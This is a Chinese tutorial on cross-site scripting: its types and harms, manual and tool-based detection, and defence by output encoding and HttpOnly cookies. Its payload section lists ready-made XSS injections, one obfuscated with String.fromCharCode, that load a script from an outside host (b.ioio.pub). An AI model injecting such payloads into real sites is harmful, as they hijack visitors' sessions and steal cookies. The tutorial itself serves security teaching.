xss：跨站脚本攻击，攻击者，把一段恶意代码镶嵌到web页面，，用户浏览页面时，嵌入页面的恶意代码就会执行，从而到达攻击用户的目的。

　　　重点在于脚本，javascript和actionscript

　　   属于前段攻击一般分为三类： 反射性xss，储存型XSS，DOM型XSS（(还有flash XSS、mXSS)。）

重要介绍 存储型xss

危害：

　　获取管理员的cookie

　　鱼叉攻击

　　挂马（水坑）

等等。

（1）反射性xss，url上有攻击者控制的参数，服务器在响应时，会把这个数据发到浏览器上并被解析。（危害不大）

（2）存储型xss，攻击者把存储型xss的代码发，被服务器接收并保存， 所有浏览该信息的用户都被XSS。

（3）domxss，DOM通常代表在html、xhtml和xml中的对象，使用DOM可以允许程序和脚本动态的访问和更新文档的内容、结构和样式。它不需要服务器解析响应的直接参与，触发XSS靠的是浏览器端的DOM解析，可以认为完全是客户端的事情。

aaarticlea/png;base64,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" alt="" />

4. flash XSS

利用网页上flash文件的缺陷来执行js脚本，一般是反射型XSS

XSS的检测

检测XSS一般分两种方法：一种是手工检测、一种是软件自动检测
手工检测：检测结果准确，但对于大型web来说费时费力
软件检测：方便省力，但存在误报，且有写隐蔽的XSS无法检测出
检测XSS最重要的就是考虑哪里有输入，输入的数据在哪里输出

存储型XSS步骤

1. 手工检测

可得知输出位置:

    • 输入敏感字符，如“<、>、"、'、()”等，然后在提交后查看html源代码，看这些字符是否被转义。

    • 在输出这些字符时，程序可能已经进行了过滤，可以输入“AAAAAA<>"&'()”字符串，然后查找AAAAAA或许比较方便。

无法得知输出位置:

    很多web应用程序源码不公开，在测试时不能的值输出位置，比如，有些留言本在留言后必须经过管理员审核才能显示，无法的值数据在后台管理页面处于何种状态，如：

    在标签中：<div>XSS Test</div>

    在属性内：<input type="text" name="content" value="XSS Test" />

    这种情况通常采用输入"/>XSS Test来测试。

2. 全自动检测XSS

如APPSCAN、AWVS、Burp Suite等软件都可以有效的检测XSS，他们还会检测其他的漏洞，但是他们的效率不如专业的XSS检测工具高。
专业的XSS扫描工具有知名的XSSER、XSSF等，还有专门扫描DOM类型XSS的web服务(www.domxssscanner.com)。
一般要手工和软件一起使用，因为有些XSS软件不能检测，不如有些留言需要输入验证码等，工具无法做到。

XSS一般就是闭合标签，和SQL注入类似，常见payload如下：

• <script src='http://b.ioio.pub/xss/probe.js'></script>

• <img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js'";>

• <svg onload=s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js>

• <svg onload=eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,

    114,105,112,116,39,41,59,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,

    115,46,115,114,99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,47,120,115,115,47,

    112,114,111,98,101,46,106,115)) >

XSS的防御

1. 过滤输入与输出(重点)

使用hemlspecialchars()和hemlentities()将一些预定义的字符转换为HTML实体

<?php

    @$html = $_GET['x'];

    if ($html){

        echo htmlspecialchars($html);

    }

?>

2. HttpOnly

HttpOnly并不能防御XSS，它是为了解决XSS漏洞后面的Cookie劫持攻击，它可以有效地阻挡XSS会话劫持攻击。